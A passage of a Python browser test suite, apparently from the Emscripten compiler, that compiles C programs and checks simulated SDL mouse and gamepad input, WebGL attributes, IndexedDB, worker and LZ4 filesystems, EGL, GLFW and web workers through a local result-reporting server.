var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
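# Same mouse simulation, but the canvas sits inside an offset container in a custom page,
# so translating for the canvas offsets is exercised (-DTEST_SDL_MOUSE_OFFSETS).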
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch a 'gamepadconnected' event (required for the glfw joystick code; not used in the SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('test_glfw_joystick.c', self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
self.compile_btest(['test_glfw_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# JavaScript code to check whether the WebGL implementation supports the context attributes
# we want to test (request the attribute, create a context, then read the value back from the
# resulting context attributes). The tests still succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest('write_file.cpp', '0', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
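# file_db.cpp persists the preloaded secret on the first run; later runs must read the stored
# secret back, even when a different file is preloaded over it.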
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
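# Two builds share the same secret: one with -DFIRST to seed the IDBFS state, and one
# without (optionally with -DEXTRA_WORK) to verify that the data persisted.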
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1'] + self.get_async_args()
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = self.get_async_args() + ['-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
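# Mounts WORKERFS with a Blob and a File created in pre.js, then reads both back from the
# program running in a worker.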
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
if not os.path.exists('sub'):
os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
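# Exercises LZ4-compressed file packages three ways: packaged by emcc (-s LZ4=1),
# pre-compressed by the file packager (--lz4), and loaded manually at runtime.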
def test_fs_lz4fs_package(self):
# generate data
self.clear()
os.mkdir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc: -s LZ4=1 tells emcc to pass the LZ4 option on to the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. The client receives compressed data and can use it directly; this is the typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'])
# non-lz4 for comparison:
# try:
#   os.mkdir('files')
# except OSError:
#   pass
# shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
# shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
# shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
# out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
# open('files.js', 'wb').write(out)
# self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
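# Runs idbstore.c through a sequence of -DSTAGE values, clearing the working directory
# between runs so that state can only persist through IndexedDB.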
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
self.compile_btest(['sdl_gl_read.c', '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
create_test_file('test_egl.c', self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
self.compile_btest(['-O2', 'test_egl.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
def _test_egl_width_height_base(self, *args):
create_test_file('test_egl_width_height.c', self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
self.compile_btest(['-O2', 'test_egl_width_height.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def do_test_worker(self, args=[]):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20:' + ('data%20for%20w' if file_data else '') + ':')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
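# Serves random data in small chunks from a local server and checks that a worker can fetch
# it with synchronous XHR and report the expected adler32 checksum.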
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
